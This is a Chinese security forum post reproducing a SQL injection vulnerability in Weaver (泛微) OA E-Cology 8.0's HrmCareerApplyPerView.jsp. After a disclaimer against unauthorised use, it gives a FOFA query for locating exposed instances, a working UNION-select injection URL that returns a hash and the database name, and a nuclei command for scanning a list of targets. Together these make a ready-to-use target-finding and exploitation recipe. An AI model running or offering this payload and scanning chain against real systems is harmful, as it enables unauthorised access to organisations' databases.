请选择 进入手机版 | 继续访问电脑版
查看: 6945|回复: 0

漏洞复现 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞

[复制链接]
匿名
匿名  发表于 2023-4-4 18:34:14 |阅读模式
0x01 阅读须知

技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

泛微新一代移动办公平台e-cology8.0不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology v8.0平台HrmCareerApplyPerView.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取数据库权限。

qw1.jpg

0x03 漏洞复现

fofa:
[AppleScript] 纯文本查看 复制代码
app="泛微-协同办公OA"


1.使用POC查询md5加密的abc和库名,得到回显
[AppleScript] 纯文本查看 复制代码
http://{{Hostname}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1%2c2%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'abc'))%2cdb_name(1)%2c5%2c6%2c

qw2.jpg

2.nuclei验证已发表于知识星球
[AppleScript] 纯文本查看 复制代码
nuclei.exe-tFanWeiOA_E-Cology_HrmCareerApplyPerView_SQL.yaml-lsubs.txt-stats

qw3.jpg





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

GMT+8, 2024-4-19 09:37 , Processed in 0.040037 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部